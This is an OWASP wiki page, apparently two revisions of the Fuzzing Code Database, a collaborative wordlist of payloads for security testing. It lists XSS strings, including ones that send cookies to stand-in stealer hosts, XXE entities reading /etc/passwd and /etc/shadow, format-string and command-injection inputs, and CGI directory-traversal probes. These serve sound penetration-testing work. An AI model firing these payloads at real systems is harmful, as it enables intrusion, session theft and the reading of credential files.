"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Florian Roth @4nc4p<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the project by volunteering for one of the tasks or by sending your comments, questions, and suggestions to wagner.elias |at| owasp.org. <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| leader_name = Wagner Elias<br />
| leader_username = Wagner.elias<br />
| mailing_list_name = owasp-fuzzing-code-database<br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80304
Category:OWASP Fuzzing Code Database
2010-03-22T17:17:17Z
<p>Foobar23: /* SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) */ - marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force approaches. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Deleted 33 duplicate XSS Statements <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intends to create a database that concentrates all tools which are based on wordlists, such as WebScarab, JBroFuzz, WebSlayer, DirBuster and others. In addition to the current tools developed by OWASP members, we will create a database following a style similar to the Open Vulnerability and Assessment Language (OVAL), where any tool can adopt and use an XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included in this project: <br />
<br />
1 - The statements of ASDR Project <br />
<br />
2 - Browser <br />
<br />
3 - Operating System <br />
<br />
4 - Databases <br />
<br />
A URL will also be published to create a collaborative environment for the maintenance process, where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if it is not valid yet and not maintained in another database. <br />
<br />
2 - A list where, besides the statement, a single id will be maintained to identify each statement, with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users in reporting their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely means the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404s for 403s. <br />
# Alternatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00<br />
dcshop/auth_data/auth_user_file.txt<br />
dcshop/orders/orders.txt<br />
dfire.cgi<br />
diagnose.cgi<br />
dig.cgi<br />
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00<br />
displayTC.pl<br />
dnewsweb<br />
donothing<br />
dose.pl?daily&somefile.txt&|ls|<br />
download.cgi<br />
dumpenv.pl<br />
edit.pl<br />
empower?DB=whateverwhatever<br />
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
enter.cgi<br />
environ.cgi<br />
environ.pl<br />
environ.pl?param1=<script>alert(document.cookie)</script><br />
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
eshop.pl/seite=;cat%20eshop.pl|<br />
ex-logger.pl<br />
excite<br />
excite;IF<br />
ezadmin.cgi<br />
ezboard.cgi<br />
ezman.cgi<br />
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|<br />
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1<br />
ezshopper2/loadpage.cgi<br />
ezshopper3/loadpage.cgi<br />
faqmanager.cgi?toc={KNOWNFILE}%00<br />
faxsurvey?cat%20{KNOWNFILE}<br />
filemail<br />
filemail.pl<br />
finger<br />
finger.pl<br />
flexform<br />
flexform.cgi<br />
fom.cgi?file=<script>alert('XSS')</script><br />
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable<br />
formmail<br />
formmail.cgi<br />
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail.pl<br />
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test<br />
fortune<br />
ftp.pl<br />
ftpsh<br />
gH.cgi<br />
gbadmin.cgi?action=change_adminpass<br />
gbadmin.cgi?action=change_automail<br />
gbadmin.cgi?action=colors<br />
gbadmin.cgi?action=setup<br />
gbook/gbook.cgi?_MAILTO=xx;ls<br />
gbpass.pl<br />
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1<br />
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1<br />
getdoc.cgi<br />
